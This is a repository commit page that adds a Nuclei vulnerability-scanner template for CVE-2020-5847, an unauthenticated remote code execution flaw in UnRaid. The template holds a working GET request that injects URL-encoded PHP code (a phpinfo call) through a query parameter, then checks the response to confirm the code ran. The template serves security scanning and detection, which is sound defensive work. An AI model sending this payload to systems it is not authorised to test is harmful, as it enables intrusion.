daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2020-5847.yaml

patch-1
SaN ThosH 2021-02-15 02:22:26 +05:30 committed by GitHub
parent aa6128fb5b
commit 70c955c2c0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
cves/2020/CVE-2020-5847.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2020-5847
info:
name: UnRaid Remote Code Execution
author: madrobot
severity: high
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
tags: Directory Traversal
requests:
- method: GET
path:
- "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "http://www.php.net/"
part: body